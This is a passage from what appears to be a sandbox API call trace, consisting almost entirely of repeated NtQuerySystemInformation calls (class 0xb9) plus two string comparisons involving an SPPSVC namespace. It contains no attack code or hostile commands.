(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc10, Length=0x28, ResultLength=0x0) [0283.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc10, Length=0x28, ResultLength=0x0) [0283.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x28, ResultLength=0x0) [0283.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x38, ResultLength=0x0) [0283.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd00, Length=0x28, ResultLength=0x0) [0283.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd00, Length=0x28, ResultLength=0x0) [0283.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x38, ResultLength=0x0) [0283.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc60, Length=0x20, ResultLength=0x0) [0283.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x20, ResultLength=0x0) [0283.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x20, ResultLength=0x0) [0283.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x20, ResultLength=0x0) [0283.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x38, ResultLength=0x0) [0283.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc60, Length=0x20, ResultLength=0x0) [0283.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x20, ResultLength=0x0) [0283.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x20, ResultLength=0x0) [0283.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfc0, Length=0x50, ResultLength=0x0) [0283.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfc0, Length=0x50, ResultLength=0x0) [0283.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfc0, Length=0x50, ResultLength=0x0) [0283.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ceb0, Length=0x50, ResultLength=0x0) [0283.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ceb0, Length=0x50, ResultLength=0x0) [0283.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ceb0, Length=0x50, ResultLength=0x0) [0283.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ceb0, Length=0x50, ResultLength=0x0) [0283.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x38, ResultLength=0x0) [0283.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc10, Length=0x28, ResultLength=0x0) [0283.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc10, Length=0x28, ResultLength=0x0) [0283.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc10, Length=0x28, ResultLength=0x0) [0283.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x28, ResultLength=0x0) [0283.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x38, ResultLength=0x0) [0283.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd00, Length=0x28, ResultLength=0x0) [0283.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd00, Length=0x28, ResultLength=0x0) [0283.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x38, ResultLength=0x0) [0283.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc60, Length=0x20, ResultLength=0x0) [0283.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x20, ResultLength=0x0) [0283.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x20, ResultLength=0x0) [0283.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x20, ResultLength=0x0) [0283.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x38, ResultLength=0x0) [0283.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc60, Length=0x20, ResultLength=0x0) [0283.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x20, ResultLength=0x0) [0283.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x20, ResultLength=0x0) [0283.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d070, Length=0x50, ResultLength=0x0) [0283.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cff0, Length=0x28, ResultLength=0x0) [0283.357] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0283.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d070, Length=0x50, ResultLength=0x0) [0283.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d070, Length=0x50, ResultLength=0x0) [0283.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d070, Length=0x50, ResultLength=0x0) [0283.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfa0, Length=0x38, ResultLength=0x0) [0283.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdd0, Length=0x28, ResultLength=0x0) [0283.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdd0, Length=0x28, ResultLength=0x0) [0283.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdd0, Length=0x28, ResultLength=0x0) [0283.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce40, Length=0x28, ResultLength=0x0) [0283.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfa0, Length=0x38, ResultLength=0x0) [0283.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cec0, Length=0x28, ResultLength=0x0) [0283.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cec0, Length=0x28, ResultLength=0x0) [0283.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfa0, Length=0x38, ResultLength=0x0) [0283.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce20, Length=0x20, ResultLength=0x0) [0283.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cda0, Length=0x20, ResultLength=0x0) [0283.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cda0, Length=0x20, ResultLength=0x0) [0283.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cda0, Length=0x20, ResultLength=0x0) [0283.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfa0, Length=0x38, ResultLength=0x0) [0283.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce20, Length=0x20, ResultLength=0x0) [0283.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdb0, Length=0x20, ResultLength=0x0) [0283.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdb0, Length=0x20, ResultLength=0x0) [0283.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d070, Length=0x50, ResultLength=0x0) [0283.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cff0, Length=0x28, ResultLength=0x0) [0283.375] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0283.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d070, Length=0x50, ResultLength=0x0) [0283.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d070, Length=0x50, ResultLength=0x0) [0283.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d070, Length=0x50, ResultLength=0x0) [0283.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfa0, Length=0x38, ResultLength=0x0) [0283.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdd0, Length=0x28, ResultLength=0x0) [0283.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdd0, Length=0x28, ResultLength=0x0) [0283.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdd0, Length=0x28, ResultLength=0x0) [0283.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce40, Length=0x28, ResultLength=0x0) [0283.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfa0, Length=0x38, ResultLength=0x0) [0283.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cec0, Length=0x28, ResultLength=0x0) [0283.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cec0, Length=0x28, ResultLength=0x0) [0283.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfa0, Length=0x38, ResultLength=0x0) [0283.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce20, Length=0x20, ResultLength=0x0) [0283.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cda0, Length=0x20, ResultLength=0x0) [0283.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cda0, Length=0x20, ResultLength=0x0) [0283.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cda0, Length=0x20, ResultLength=0x0) [0283.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfa0, Length=0x38, ResultLength=0x0) [0283.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce20, Length=0x20, ResultLength=0x0) [0283.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdb0, Length=0x20, ResultLength=0x0) [0283.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdb0, Length=0x20, ResultLength=0x0) [0283.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x50, ResultLength=0x0) [0283.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x50, ResultLength=0x0) [0283.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x50, ResultLength=0x0) [0283.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x50, ResultLength=0x0) [0283.396] NtQuerySystemInformation 